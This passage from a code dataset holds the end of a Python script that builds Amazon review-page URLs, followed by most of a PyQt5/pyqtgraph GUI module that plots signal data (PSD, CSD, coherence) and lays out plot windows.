genrate_urls(url):\n\n id = url.split(\"/\")[5]\n stars = ['one','two','three','four','five']\n\n print(id)\n links = []\n for i in range(2,11):\n links.append(\"https://www.amazon.in/product-reviews/\"+id+\"/ref=cm_cr_arp_d_paging_btm_next_\"+str(i)+\"?ie=UTF8&reviewerType=all_reviews&pageNumber=\"+str(i))\n \n\n\n return links\n\n\ndef generate_data(url):\n try:\n read_urls(genrate_urls(url))\n except Exception as e:\n print(\"Error \",e)\n\n\nif __name__ == '__main__':\n generate_data(\"https://www.amazon.in/OnePlus-Nord-Marble-128GB-Storage/product-reviews/B08695ZSP6/ref=cm_cr_dp_d_show_all_btm?ie=UTF8&reviewerType=all_reviews\")\n\n\n\n # sleep(5)","repo_name":"swapnillondhe24/Sentiment","sub_path":"Scraper/reviews.py","file_name":"reviews.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40034510638","text":"\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets, uic\r\nfrom PyQt5.QtWidgets import QShortcut\r\n\r\n\r\n\r\nfrom PyQt5.QtCore import QObject, pyqtSignal\r\n\r\n\r\nimport os,sys\r\nfrom os import path\r\ndirname = path.dirname(__file__)\r\nfname = \"frmMain.ui\"\r\nfpath = path.join(dirname, fname)\r\n\r\nfrom dataGuiBaseClasses import *\r\n\r\n\r\nbackGround = '#FFF'\r\nforeGround = 'k'\r\n\r\npg.setConfigOption('background', backGround)\r\npg.setConfigOption('foreground', foreGround)\r\npg.setConfigOptions(antialias=True)\r\n\r\nfrom frmLoadData import frmLoadData\r\nfrom frmShotChannel import frmShotChannel\r\nfrom frmComAction import frmComAction\r\nfrom frmParameterFilter import frmParameterFilter\r\n\r\n\r\n\r\nclass frmMainWindow(QtWidgets.QFrame, dataGuiBaseClass):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(fpath, self)\r\n\r\n dataGuiBaseClass().reset()\r\n\r\n self.lstWidgetList = [getattr(self, n) for n in dir(self) if 'lst' in n]\r\n for lst in self.lstWidgetList:\r\n QShortcut(QKeySequence(QtCore.Qt.Key_Escape), lst, lst.clearSelection,context=QtCore.Qt.WidgetShortcut)\r\n\r\n\r\n #initiate the frames\r\n\r\n #set frmLoadData\r\n self.frmLoadData = frmLoadData()\r\n # self.frmLoadData.setupUi(self.frmLoadData)\r\n self.gridLayout_2.addWidget(self.frmLoadData, 0, 0, 1, 1)\r\n\r\n\r\n #set frmComAction\r\n\r\n self.Ui_frmComAction = frmComAction(displayType = 'list')\r\n # self.Ui_frmComAction.setupUi(self.frmComAction)\r\n self.gridLayout.addWidget(self.Ui_frmComAction, 0, 2, 2, 1)\r\n\r\n\r\n\r\n\r\n #make paramFilterLayout\r\n\r\n self.Ui_frmParamFilter = frmParameterFilter()\r\n # self.Ui_frmParamFilter.setupUi(self.frmParameterFilter)\r\n self.gloParamFilter.addWidget(self.Ui_frmParamFilter, 0, 0, 1, 1)\r\n\r\n\r\n self.Ui_frmComAction_2 = frmComAction(displayType = 'table')\r\n # self.Ui_frmComAction_2.setupUi(self.frmComAction_2)\r\n self.gridLayout_5.addWidget(self.Ui_frmComAction_2, 0, 1, 2, 1)\r\n\r\n\r\n\r\n #connect signals\r\n\r\n self.frmLoadData.sigLoaded.connect(self.updateAfterLoading)\r\n\r\n\r\n #self.Ui_frmShotChannel.sigChannelListDoubleClicked.connect(functools.partial(self.plotBasic,self.Ui_frmShotChannel,self.Ui_frmWindowLayout,self.Ui_frmAction1))\r\n\r\n self.Ui_frmParamFilter.sigFilterChanged.connect(self.updateChannelTable)\r\n\r\n\r\n #connect two window lists\r\n self.Ui_frmComAction.sigWindowOpened.connect(self.Ui_frmComAction_2.updateAfterWindowOpened)\r\n self.Ui_frmComAction_2.sigWindowOpened.connect(self.Ui_frmComAction.updateAfterWindowOpened)\r\n\r\n\r\n self.Ui_frmComAction.sigIvDataAdded.connect(self.updateAfterLoading)\r\n self.Ui_frmComAction_2.sigIvDataAdded.connect(self.updateAfterLoading)\r\n self.Ui_frmComAction.sigArithmeticsDataAdded.connect(self.updateAfterLoading)\r\n self.Ui_frmComAction_2.sigArithmeticsDataAdded.connect(self.updateAfterLoading)\r\n\r\n\r\n\r\n\r\n\r\n\r\n def updateAfterLoading(self):\r\n\r\n self.Ui_frmComAction.updateChannelOptions(paramDf = self.params)\r\n self.Ui_frmComAction_2.updateChannelOptions(paramDf = self.Ui_frmParamFilter.filteredParamDf)\r\n self.Ui_frmParamFilter.updateParamList()\r\n\r\n def updateChannelTable(self):\r\n self.Ui_frmComAction_2.updateChannelOptions(self.Ui_frmParamFilter.filteredParamDf)\r\n\r\n\r\n\r\n\r\n def openNewWindow(self):\r\n windex = len(self.ws)\r\n glw = pg.GraphicsLayoutWidget()\r\n glw.resize(800,600)\r\n\r\n name = 'Window %i' % windex\r\n glw.setWindowTitle(name)\r\n glw.show()\r\n glw.windex =windex\r\n\r\n\r\n\r\n self.ws.append(glw)\r\n self.ps.append([])\r\n self.ds.append([])\r\n\r\n self.sigWindowOpened.emit()\r\n return windex\r\n\r\n def openNewWindow1(self):\r\n glw = pg.GraphicsLayoutWidget()\r\n glw.resize(800,600)\r\n windex = self.ws.count()\r\n name = 'Window %i' % windex\r\n glw.setWindowTitle(name)\r\n glw.show()\r\n glw.index =windex\r\n\r\n self.Ui_frmWindowLayout.windowListboxItem.nameList.append(name)\r\n self.Ui_frmWindowLayout.windowListboxItem.itemList.append(glw)\r\n self.Ui_frmWindowLayout.windowListboxItem.listInBox()\r\n\r\n return windex\r\n\r\n\r\n\r\n def addNewPlot(self,windex,location):\r\n pindex = len(self.ps[windex])\r\n p = pg.PlotItem()\r\n p.pindex = pindex\r\n p.location = location\r\n p.addLegend()\r\n p.legend.setScale(self.legendScale)\r\n self.ws[windex].addItem(p,location[0],location[1],location[2],location[3])\r\n self.ps[windex].append(p)\r\n self.ds[windex].append([])\r\n return pindex\r\n\r\n def addNewDataItem(self, windex,pindex,plotType,dataParam,processParam):\r\n\r\n dindex = len(self.ds[windex][pindex])\r\n\r\n\r\n pen = pg.mkPen(self.penColors[dindex%len(self.penColors)],width=self.penWidth)\r\n #pen = pg.mkPen('k',width=1)\r\n item = pg.PlotDataItem(pen=pen)\r\n item.plotType = plotType\r\n item.dataParam = dataParam\r\n item.dindex = dindex\r\n item.processParam = processParam\r\n item.pen = pen\r\n\r\n item.rawData = self.getData(dataParam)\r\n\r\n self.exeProcessFunction(item)\r\n self.ps[windex][pindex].addItem(item)\r\n self.ds[windex][pindex].append(item)\r\n return dindex\r\n\r\n def addNewImageItem (self, windex,pindex,plotType,dataParam,processParam):\r\n dindex = len(self.ds[windex][pindex])\r\n\r\n\r\n item = pg.ImageItem()\r\n item.plotType = plotType\r\n item.dataParam = dataParam\r\n item.dindex = dindex\r\n item.processParam = processParam\r\n\r\n\r\n item.rawData = self.getData(dataParam)\r\n\r\n self.exeProcessFunction(item)\r\n self.ps[windex][pindex].addItem(item)\r\n self.ds[windex][pindex].append(item)\r\n return dindex\r\n\r\n\r\n\r\n def updateYAxis(self,ax,*args,**kargs):\r\n vb = ax.linkedView()\r\n dataItems = [x for x in vb.addedItems if type(x)==type(pg.PlotDataItem())]\r\n axisArg = self.axisArgs\r\n yUnits = np.unique([item.yUnit for item in dataItems])\r\n names = [item.yName for item in dataItems]\r\n yUnit,yLabel = '',''\r\n if len(yUnits)==1:\r\n yUnit = yUnits[0]\r\n commonWords = []\r\n for word in names[0].split(' '):\r\n present = True\r\n for name in names:\r\n if word.upper() not in [x.upper() for x in name.split(' ')]:\r\n present = False\r\n if present:\r\n commonWords.append(word)\r\n commonLabels =[word for word in commonWords if word.upper() in self.plotYLabelTypes or word in self.plotYLabelTypes]\r\n if len(commonLabels)>0:\r\n maxLen = np.max([len(x) for x in commonLabels])\r\n yLabel = [x for x in commonLabels if len(x)==maxLen][0]\r\n\r\n ax.setLabel(yLabel,units = yUnit,**axisArg['labelStyleArgs'])\r\n\r\n ax.tickFont = axisArg['tickFont']\r\n ax.setPen(axisArg['axisPen'])\r\n ax.setStyle(tickLength = axisArg['tickLength'])\r\n\r\n ax.setWidth(w=axisArg['yAxisWidth'])\r\n ax.setStyle(tickTextOffset = axisArg['yTickTextOffset'])\r\n return ax\r\n\r\n def updateXAxis(self,ax,*args,**kargs):\r\n vb = ax.linkedView()\r\n dataItems = [x for x in vb.addedItems if type(x)==type(pg.PlotDataItem())]\r\n axisArg = self.axisArgs\r\n xUnits = np.unique([item.xUnit for item in dataItems])\r\n names = [item.xName for item in dataItems]\r\n xUnit,xLabel = '',''\r\n\r\n if len(xUnits)==1:\r\n xUnit = xUnits[0]\r\n commonWords = []\r\n for word in names[0].split(' '):\r\n present = True\r\n for name in names:\r\n if word.upper() not in [x.upper() for x in name.split(' ')]:\r\n present = False\r\n if present:\r\n commonWords.append(word)\r\n commonLabels =[word for word in commonWords if word.upper() in self.plotXLabelTypes or word in self.plotYLabelTypes]\r\n if len(commonLabels)>0:\r\n maxLen = np.max([len(x) for x in commonLabels])\r\n xLabel = [x for x in commonLabels if len(x)==maxLen][0]\r\n\r\n ax.setLabel(xLabel,units = xUnit,**axisArg['labelStyleArgs'])\r\n ax.tickFont = axisArg['tickFont']\r\n ax.setPen(axisArg['axisPen'])\r\n ax.setStyle(tickLength = axisArg['tickLength'])\r\n ax.setHeight(h=axisArg['xAxisHeight'])\r\n ax.setStyle(tickTextOffset = axisArg['xTickTextOffset'])\r\n return ax\r\n\r\n def updateViews(self,p):\r\n vbs = [x for x in p.scene().items() if type(x) ==type(pg.ViewBox())][1:]\r\n for vb in vbs:\r\n vb.setGeometry(p.vb.sceneBoundingRect())\r\n ## need to re-update linked axes since this was called\r\n ## incorrectly while views had different shapes.\r\n ## (probably this should be handled in ViewBox.resizeEvent)\r\n vb.linkedViewChanged(p.vb,vb.XAxis)\r\n\r\n\r\n\r\n\r\n\r\n def plotBasic(self, shotChannelItem, windowLayoutItem,actionItem):\r\n\r\n nPlotRow,nPlotColumn = 1,1\r\n windex,pindexes,dataParam,processParam = self.getInitialInfo(shotChannelItem, windowLayoutItem,actionItem,nPlotRow=nPlotRow,nPlotColumn=nPlotColumn)\r\n if windex ==None:\r\n return\r\n\r\n #prepare dataParams\r\n dataParamList = [dataParam[dataParam.index==i] for i in range(len(dataParam))]\r\n pTypeList = self.pTypeBasicKey\r\n for dataParam in dataParamList:\r\n #dindex = self.addNewDataItem(windex,pindexes[0][0],pTypeList, dataParam,processParam)\r\n dindex = self.addNewDataItem(windex,pindexes[0][0],pTypeList, dataParam,processParam)\r\n self.updateXAxis(self.ps[windex][pindexes[0][0]].getAxis('bottom'))\r\n self.updateYAxis(self.ps[windex][pindexes[0][0]].getAxis('left'))\r\n\r\n windowLayoutItem.lstWindow.item(windex).setSelected(True)\r\n windowLayoutItem.updatePlotLayouts()\r\n if self.selectPlot:\r\n windowLayoutItem.tblPlot1.item(self.tempSelectedRow,self.tempSelectedColumn).setSelected(True)\r\n\r\n\r\n\r\n\r\n\r\n def getInitialInfo(self,shotChannelItem, windowLayoutItem,actionItem,\r\n nPlotRow=1,nPlotColumn=1):\r\n #print (\"begin getInitialInfo\")\r\n # return if shotnum or channel is not selected\r\n if not shotChannelItem.selectedChannelIDs:\r\n print (\"shotchannel not selected\")\r\n return None,None,None,None\r\n\r\n if len(windowLayoutItem.lstWindow.selectedItems())>1:\r\n print (\"too many windows\")\r\n return None,None,None,None\r\n windex,location = self.getStartingLocation(windowLayoutItem)\r\n pindexes = self.getPindexes(windex=windex,location=location, nPlotRow=nPlotRow, nPlotColumn=nPlotColumn)\r\n if pindexes == None:\r\n print(\"no pindex\")\r\n return None,None,None,None\r\n #print (\"made it\")\r\n # get indexes for channels\r\n\r\n processParam = actionItem.getProcessParams()\r\n dataParam=self.params[self.params[self.channelIdKey].isin(np.array(shotChannelItem.selectedChannelIDs).astype(self.params[self.channelIdKey].dtype))].reset_index(drop=True)\r\n return windex,pindexes,dataParam,processParam\r\n\r\n\r\n\r\n def plotPsd(self,shotChannelItem, windowLayoutItem,actionItem):\r\n self.times = []\r\n\r\n nPlotRow,nPlotColumn = 2,1\r\n windex,pindexes,dataParam,processParam = self.getInitialInfo(shotChannelItem, windowLayoutItem,actionItem,nPlotRow=nPlotRow,nPlotColumn=nPlotColumn)\r\n if windex == None:\r\n return\r\n\r\n #prepare dataParams\r\n dataParamList = [dataParam[dataParam.index==i] for i in range(len(dataParam))]\r\n pTypeList = [self.pTypePsdKey,self.pTypeBasicKey]\r\n\r\n for i in range(2):\r\n for dataParam in dataParamList:\r\n dindex = self.addNewDataItem(windex,pindexes[i][0],pTypeList[i], dataParam,processParam)\r\n self.updateXAxis(self.ps[windex][pindexes[i][0]].getAxis('bottom'))\r\n self.updateYAxis(self.ps[windex][pindexes[i][0]].getAxis('left'))\r\n\r\n xRegion = pg.LinearRegionItem()\r\n xRegion.xRegionSlot = None\r\n xRegion.setZValue(10)\r\n xRegion.sigRegionChanged.connect(lambda: self.updateXRegion(windex,pindexes[0][0],xRegion,**self.keys))\r\n self.ps[windex][pindexes[1][0]].addItem(xRegion,ignoreBounds=True)\r\n self.ps[windex][pindexes[0][0]].setAutoVisible(y=True)\r\n self.ps[windex][pindexes[1][0]].setAutoVisible(y=True)\r\n xRegion.setRegion([0.018,0.020])\r\n #xRegion.setRegion([0.018, 0.020])\r\n windowLayoutItem.lstWindow.item(windex).setSelected(True)\r\n windowLayoutItem.updatePlotLayouts()\r\n if self.selectPlot:\r\n windowLayoutItem.tblPlot1.item(self.tempSelectedRow,self.tempSelectedColumn).setSelected(True)\r\n\r\n\r\n def plotCsd(self,shotChannelItem, windowLayoutItem,actionItem):\r\n self.times = []\r\n\r\n nPlotRow,nPlotColumn = 4,1\r\n windex,pindexes,dataParam,processParam = self.getInitialInfo(shotChannelItem, windowLayoutItem,actionItem,nPlotRow=nPlotRow,nPlotColumn=nPlotColumn)\r\n if windex == None:\r\n return\r\n\r\n #prepare dataParams\r\n pTypeList = [self.pTypeCsdKey,self.pTypeCohKey,self.pTypePhaseKey,self.pTypeBasicKey]\r\n paramList = [dataParam[dataParam.index==i] for i in range(len(dataParam))]\r\n\r\n self.addNewDataItem(windex,pindexes[0][0],pTypeList[0], dataParam,processParam)\r\n yAx,xAx = self.ps[windex][pindexes[0][0]].getAxis('left'),self.ps[windex][pindexes[0][0]].getAxis('bottom')\r\n self.updateYAxis(yAx)\r\n self.updateXAxis(xAx)\r\n #self.ps[windex][pindexes[0][0]].legend.hide()\r\n xAx.setStyle(tickLength = -self.tickLength, showValues=False)\r\n xAx.showLabel(False)\r\n xAx.setMaximumHeight(0)\r\n\r\n self.addNewDataItem(windex,pindexes[1][0],pTypeList[1], dataParam,processParam)\r\n yAx,xAx = self.ps[windex][pindexes[1][0]].getAxis('left'),self.ps[windex][pindexes[1][0]].getAxis('bottom')\r\n self.ps[windex][pindexes[1][0]].legend.hide()\r\n self.updateYAxis(yAx)\r\n self.updateXAxis(xAx)\r\n xAx.setStyle(tickLength = -self.tickLength, showValues=False)\r\n xAx.showLabel(False)\r\n xAx.setMaximumHeight(0)\r\n\r\n self.addNewDataItem(windex,pindexes[2][0],pTypeList[2], dataParam,processParam)\r\n self.updateYAxis(self.ps[windex][pindexes[2][0]].getAxis('left'))\r\n self.updateXAxis(self.ps[windex][pindexes[2][0]].getAxis('bottom'))\r\n self.ps[windex][pindexes[2][0]].legend.hide()\r\n self.ps[windex][pindexes[2][0]].getAxis('bottom').setStyle(tickLength = -self.tickLength)\r\n\r\n self.ps[windex][pindexes[0][0]].setXLink(self.ps[windex][pindexes[2][0]])\r\n self.ps[windex][pindexes[1][0]].setXLink(self.ps[windex][pindexes[2][0]])\r\n #self.ps[windex][pindexes[2][0]].vb.sigResized.connect(functools.partial(self.linkMaxHeight,self.ps[windex][pindexes[2][0]].vb,[self.ps[windex][pindexes[1][0]],self.ps[windex][pindexes[0][0]]]))\r\n #self.ps[windex][pindexes[2][0]].vb.sigResized.connect(functools.partial(self.TESTPRINT,self.ps[windex][pindexes[2][0]]))\r\n #self.ws[windex].sigDeviceRangeChanged.connect(functools.partial(self.linkMaxHeight,windex,[self.ps[windex][pindexes[0][0]],self.ps[windex][pindexes[1][0]],self.ps[windex][pindexes[2][0]],self.ps[windex][pindexes[3][0]]]))\r\n\r\n for i in range(2):\r\n dindex = self.addNewDataItem(windex,pindexes[3][0],pTypeList[3], paramList[i],processParam)\r\n #self.updateXAxis(self.ps[windex][pindexes[i][0]].getAxis('bottom'))\r\n self.updateYAxis(self.ps[windex][pindexes[3][0]].getAxis('left'))\r\n self.updateXAxis(self.ps[windex][pindexes[3][0]].getAxis('bottom'))\r\n\r\n #self.ps[windex][pindexes[0][0]].getAxis('bottom').label.hide()\r\n #self.ws[windex].sigDeviceRangeChanged.connect(functools.partial(self.linkMaxHeight,windex,[pindexes[0][0],pindexes[1][0],pindexes[2][0],pindexes[3][0]]))\r\n self.ws[windex].sigDeviceRangeChanged.connect(functools.partial(self.linkMaxHeight,windex,[pindexes[0][0],pindexes[1][0],pindexes[2][0],pindexes[3][0]]))\r\n xRegion = pg.LinearRegionItem()\r\n xRegion.xRegionSlot = None\r\n xRegion.setZValue(10)\r\n xRegion.sigRegionChanged.connect(lambda: self.updateXRegion(windex,pindexes[0][0],xRegion,**self.keys))\r\n xRegion.sigRegionChanged.connect(lambda: self.updateXRegion(windex,pindexes[1][0],xRegion,**self.keys))\r\n xRegion.sigRegionChanged.connect(lambda: self.updateXRegion(windex,pindexes[2][0],xRegion,**self.keys))\r\n self.ps[windex][pindexes[3][0]].addItem(xRegion,ignoreBounds=True)\r\n self.ps[windex][pindexes[0][0]].setAutoVisible(y=True)\r\n self.ps[windex][pindexes[1][0]].setAutoVisible(y=True)\r\n self.ps[windex][pindexes[2][0]].setAutoVisible(y=True)\r\n xRegion.setRegion([0.018,0.020])\r\n #xRegion.setRegion([0.018, 0.020])\r\n windowLayoutItem.lstWindow.item(windex).setSelected(True)\r\n\r\n windowLayoutItem.updatePlotLayouts()\r\n if self.selectPlot:\r\n windowLayoutItem.tblPlot1.item(self.tempSelectedRow,self.tempSelectedColumn).setSelected(True)\r\n\r\n\r\n def TESTPRINT(self,view):\r\n print (view.height())\r\n\r\n\r\n def linkMaxHeight(self,windex,pindexes):\r\n ##START HERE\r\n p=pg.PlotItem()\r\n w = self.ws[windex]\r\n items,locs = [x for x in w.ci.items.keys()],[x for x in w.ci.items.values()]\r\n\r\n ps= [items[i] for i in range(len(items)) if type(items[i])==type(p)]\r\n\r\n plocs=[locs[i] for i in range(len(items)) if type(items[i])==type(p)]\r\n\r\n rows,columns = [],[]\r\n\r\n for ploc in plocs:\r\n rows+=[x[0] for x in ploc]\r\n columns+=[x[1] for x in ploc]\r\n rows,columns = np.unique(rows), np.unique(columns)\r\n pUnitHeight = (w.height()-self.wHeightOffset-self.wHeightInc*len(rows))/len(rows)\r\n pUnitWidth = (w.width()-self.wWidthOffset-self.wWidthInc*len(columns))/len(columns)\r\n\r\n for column in columns:\r\n indexes = [i for i in range(len(ps)) if column in [x[1] for x in plocs[i]]]\r\n rowSpans = [len([x for x in plocs[i] if column==x[1]]) for i in indexes]\r\n totalRows = np.sum(rowSpans)\r\n availHeight = pUnitHeight*totalRows\r\n for i in indexes:\r\n p=ps[i]\r\n cItems = p.childItems()\r\n availHeight -= cItems[0].height()+cItems[1].height()+self.pHeightOffset\r\n vUnitHeight = availHeight/totalRows\r\n\r\n for i in range(len(indexes)):\r\n p=ps[indexes[i]]\r\n cItems = p.childItems()\r\n p.setMaximumHeight(vUnitHeight*rowSpans[i]+cItems[0].height()+cItems[1].height()+self.pHeightOffset)\r\n p.setMinimumHeight(vUnitHeight*rowSpans[i]+cItems[0].height()+cItems[1].height()+self.pHeightOffset)\r\n\r\n for row in rows:\r\n indexes = [i for i in range(len(ps)) if row in [x[0] for x in plocs[i]]]\r\n columnSpans = [len([x for x in plocs[i] if row==x[0]]) for i in indexes]\r\n totalColumns = np.sum(columnSpans)\r\n availWidth = pUnitWidth*totalColumns\r\n for i in indexes:\r\n p=ps[i]\r\n cItems = p.childItems()\r\n availWidth -= cItems[2].width()+cItems[3].width()+self.pWidthOffset\r\n vUnitWidth = availWidth/totalColumns\r\n\r\n for i in range(len(indexes)):\r\n p=ps[indexes[i]]\r\n cItems = p.childItems()\r\n p.setMaximumWidth(vUnitWidth*columnSpans[i]+cItems[2].width()+cItems[3].width()+self.pWidthOffset)\r\n p.setMinimumWidth(vUnitWidth*columnSpans[i]+cItems[2].width()+cItems[3].width()+self.pWidthOffset)\r\n\r\n \"\"\"\r\n plots = [self.ps[windex][i] for i in pindexes]\r\n totalHeight = 0\r\n\r\n #self.ws[windex].updateScene()\r\n for p in plots:\r\n totalHeight+=p.height()\r\n print self.ws[windex].geometry().height()-totalHeight\r\n\r\n\r\n print self.ws[windex].geometry()\r\n\r\n plots = [self.ps[windex][i] for i in pindexes]\r\n\r\n for p in plots:\r\n p.setMaximumHeight(12000)\r\n self.ws[windex].ci._updateView()\r\n\r\n totalHeight = 0\r\n\r\n #self.ws[windex].updateScene()\r\n for p in plots:\r\n totalHeight+=p.vb.height()\r\n #print v.height()\r\n height = totalHeight/(len(plots)+0.0)\r\n\r\n\r\n for p in plots:\r\n #p.setMaximumHeight(p.height()+height-p.vb.height())\r\n p.setMinimumHeight(p.height()+height-p.vb.height())\r\n \"\"\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n def getProcessParam(self):\r\n # get parameters\r\n\r\n\r\n nperseg = self.cmbNperseg.currentText()\r\n if nperseg =='-':\r\n nperseg = 512\r\n elif not nperseg.isdigit():\r\n nperseg = 512\r\n else:\r\n nperseg = int (nperseg)\r\n\r\n overlap = self.sbxOverlap.text()\r\n if overlap =='':\r\n overlap = 50\r\n elif not overlap.isdigit():\r\n overlap = 50\r\n else:\r\n overlap = int(overlap)\r\n processParams = {self.isSmoothKey:self.cbxSmooth.isChecked(),\r\n self.nSmoothKey: self.ledNSmooth.text(),\r\n self.isDcCancelHeadKey: self.rbtDcCancelHead.isChecked(),\r\n self.nDcCancelHeadKey: self.ledNDcCancelHead.text(),\r\n self.isDcCancelTailKey: self.rbtDcCancelTail.isChecked(),\r\n self.nDcCancelTailKey: self.ledNDcCancelTail.text(),\r\n self.npersegKey:nperseg,\r\n self.isUncalibratedSignalKey:self.cbxUncalibratedSignal.isChecked(),\r\n self.isNormalizePsdKey:self.cbxNormalizePsd.isChecked(),\r\n self.overlapKey:overlap\r\n }\r\n return processParams\r\n\r\n def getParams(self,shotChannelItem):\r\n\r\n param = self.params[self.params[self.channelIdKey].isin(shotChannelItem.selectedChannelIDs)].reset_index(drop=True)\r\n return param\r\n\r\n def getData (self,param):\r\n\r\n data = pd.DataFrame()\r\n for shotNum in list (param[self.shotNumKey].unique()):\r\n dataIndex = [x for x in range(len(self.dataList)) if self.dataList[x][self.shotNumKey]==str(shotNum)][0]\r\n tempData = self.dataList[dataIndex][self.dfKey]\r\n tempParam = param[param[self.shotNumKey]==shotNum].reset_index(drop=True)\r\n channels = list(tempParam[self.channelDescriptionKey].unique())\r\n channelMask = np.zeros(len(tempData.columns)).astype(bool)\r\n for channelName in channels:\r\n para = tempParam[tempParam[self.channelDescriptionKey]==channelName].reset_index(drop=True)\r\n channelId = para[self.channelIdKey][0]\r\n channelMask = channelMask | (tempData.columns==channelId)\r\n tempData = tempData[tempData.columns[channelMask]]\r\n data= pd.concat([data, tempData], axis=1).reset_index(drop=True)\r\n null = pd.isnull(data).any(1).nonzero()[0]\r\n if len(null)>0:\r\n data = data.ix[:(null[0]-1),:]\r\n return data\r\n\r\n\r\n\r\n def activateWindow(self):\r\n if len(self.Ui_frmWindowLayout.lstWindow.selectedIndexes())==0:\r\n return\r\n windex = self.Ui_frmWindowLayout.lstWindow.selectedIndexes()[0].row()\r\n window = self.ws[windex]\r\n window.setWindowState(window.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)\r\n window.activateWindow()\r\n\r\n\r\n def updateAvailChannel(self):\r\n\r\n for item in [self.Ui_frmShotChannel.lstChannel.item(i) for i in range(self.Ui_frmShotChannel.lstChannel.count())]:\r\n item.setFlags(item.flags() | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\r\n item.setBackgroundColor(self.listBgColor)\r\n\r\n if len(self.Ui_frmShotChannel.lstLoadedShot.selectedItems())==0:\r\n return\r\n\r\n shotNums = [x.text() for x in self.Ui_frmShotChannel.lstLoadedShot.selectedItems()]\r\n for item in [self.Ui_frmShotChannel.lstChannel.item(i) for i in range(self.Ui_frmShotChannel.lstChannel.count())]:\r\n count = 0\r\n for shotNum in shotNums:\r\n tempParam = self.params[self.params[self.shotNumKey]==int(shotNum)]\r\n if item.text() in list(tempParam[self.channelDescriptionKey]):\r\n count +=1\r\n\r\n if count == 0: #if the channel cannot be found in any shots selected\r\n item.setFlags(item.flags() & ~QtCore.Qt.ItemIsSelectable & ~QtCore.Qt.ItemIsEnabled)\r\n elif count < len(shotNums):#only some but not all the shots selected have the channel\r\n item.setBackgroundColor(self.listIncompleteMatchBgColor)\r\n\r\n\r\n def updateAvailShot (self):\r\n for item in [self.Ui_frmShotChannel.lstLoadedShot.item(i) for i in range(self.Ui_frmShotChannel.lstLoadedShot.count())]:\r\n item.setFlags(item.flags() | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\r\n item.setBackgroundColor(self.listBgColor)\r\n\r\n if len(self.Ui_frmShotChannel.lstChannel.selectedItems())==0:\r\n return\r\n\r\n channels = [x.text() for x in self.Ui_frmShotChannel.lstChannel.selectedItems()]\r\n for item in [self.Ui_frmShotChannel.lstLoadedShot.item(i) for i in range(self.Ui_frmShotChannel.lstLoadedShot.count())]:\r\n count = 0\r\n for channel in channels:\r\n tempParam = self.params[self.params[self.channelDescriptionKey]==channel]\r\n if int(item.text()) in list(tempParam[self.shotNumKey]):\r\n count +=1\r\n\r\n if count == 0: #if the channel cannot be found in any shots selected\r\n item.setFlags(item.flags() & ~QtCore.Qt.ItemIsSelectable & ~QtCore.Qt.ItemIsEnabled)\r\n elif count < len(channels):#only some but not all the shots selected have the channel\r\n item.setBackgroundColor(self.listIncompleteMatchBgColor)\r\n\r\n def selectPlotLayout(self,windex=None, pindexes=[]):\r\n if windex==None or not pindexes:\r\n return\r\n locations = [self.ps[windex][i] in pindexes]\r\n for location in locations:\r\n row, column = location[:2]\r\n self.Ui_frmWindowLayout.tblPlot1.item(row,column).setSelected(True)\r\n\r\n\r\n def getPlotItemLocation(self,windex=None,pNumber=None):\r\n if windex==None or pNumber ==None:\r\n return None,None\r\n gl = self.Ui_frmWindowLayout.windowListboxItem.itemList[windex].ci\r\n items = gl.items.keys()\r\n pindexes = [i for i in range(len(items)) if type(items[i])==type(PlotItem1D())]\r\n locations = gl.items.values()\r\n for pindex in pindexes:\r\n if items[pindex].number == pNumber:\r\n return items[pindex],locations[pindexes]\r\n return None,None\r\n\r\n def getStartingLocation (self,windowLayoutItem):\r\n self.selectPlot = False #select the plot in the layout after plotting\r\n\r\n # return if # of cells have conflict with occupied cells (not for basic plot)\r\n if not windowLayoutItem.lstWindow.selectedItems():\r\n windex = self.openNewWindow()\r\n\r\n else:\r\n windex = windowLayoutItem.lstWindow.selectedIndexes()[0].row()\r\n\r\n if not windowLayoutItem.tblPlot1.selectedItems():\r\n # find the lowest column and highest to row to start\r\n # check for interference\r\n row,column = self.findAvailableLocation(windex)\r\n location = (row,column,1,1)\r\n else:\r\n location = locationToPlot(windowLayoutItem.tblPlot1)\r\n self.selectPlot=True\r\n self.tempSelectedRow,self.tempSelectedColumn = windowLayoutItem.tblPlot1.selectedItems()[0].row(),windowLayoutItem.tblPlot1.selectedItems()[0].column()\r\n return windex,location\r\n\r\n\r\n def findAvailableLocation (self,windex):\r\n if len(self.ps[windex])==0:\r\n return 0,0\r\n\r\n locations = [x.location for x in self.ps[windex]]\r\n minColumn = np.min([x[1] for x in locations])\r\n pLocs = [x for x in locations if x[1]==minColumn]\r\n maxRow = np.max([x[0] for x in pLocs])\r\n lastLoc = [x for x in pLocs if x[0] == maxRow][0]\r\n row,column = lastLoc[0]+lastLoc[2],lastLoc[1]\r\n return row,column\r\n\r\n def getPindexes(self, windex=None,location=(0,0,1,1), nPlotRow=1, nPlotColumn=1):\r\n if windex ==None:\r\n return None\r\n rowSpan,columnSpan = location[2],location[3]\r\n occupiedLocations = [x.location for x in self.ps[windex]]\r\n\r\n pindexes = []\r\n\r\n planLocations = []\r\n for i in range(nPlotRow):\r\n planRow = []\r\n for j in range(nPlotColumn):\r\n planRow.append((location[0]+i*rowSpan,location[1]+j*columnSpan,rowSpan,columnSpan))\r\n planLocations.append(planRow)\r\n\r\n #check if location is on one of the plots\r\n if planLocations[0][0] in occupiedLocations:\r\n for i in range(nPlotRow):\r\n rowOfPindexes = []\r\n for j in range(nPlotColumn):\r\n if planLocations[i][j] not in occupiedLocations:\r\n return None\r\n else:\r\n rowOfPindexes.append(occupiedLocations.index(planLocations[i][j]))\r\n pindexes.append(rowOfPindexes)\r\n return pindexes\r\n\r\n else:\r\n for i in range(nPlotRow):\r\n for j in range(nPlotColumn):\r\n if planLocations[i][j] in occupiedLocations:\r\n return None\r\n\r\n for i in range(nPlotRow):\r\n rowOfPindexes = []\r\n for j in range(nPlotColumn):\r\n pindex = self.addNewPlot(windex,planLocations[i][j])\r\n rowOfPindexes.append(pindex)\r\n\r\n pindexes.append(rowOfPindexes)\r\n return pindexes\r\n\r\n def processFunctionBasic (self,pItem, *args,**kargs):\r\n\r\n para = 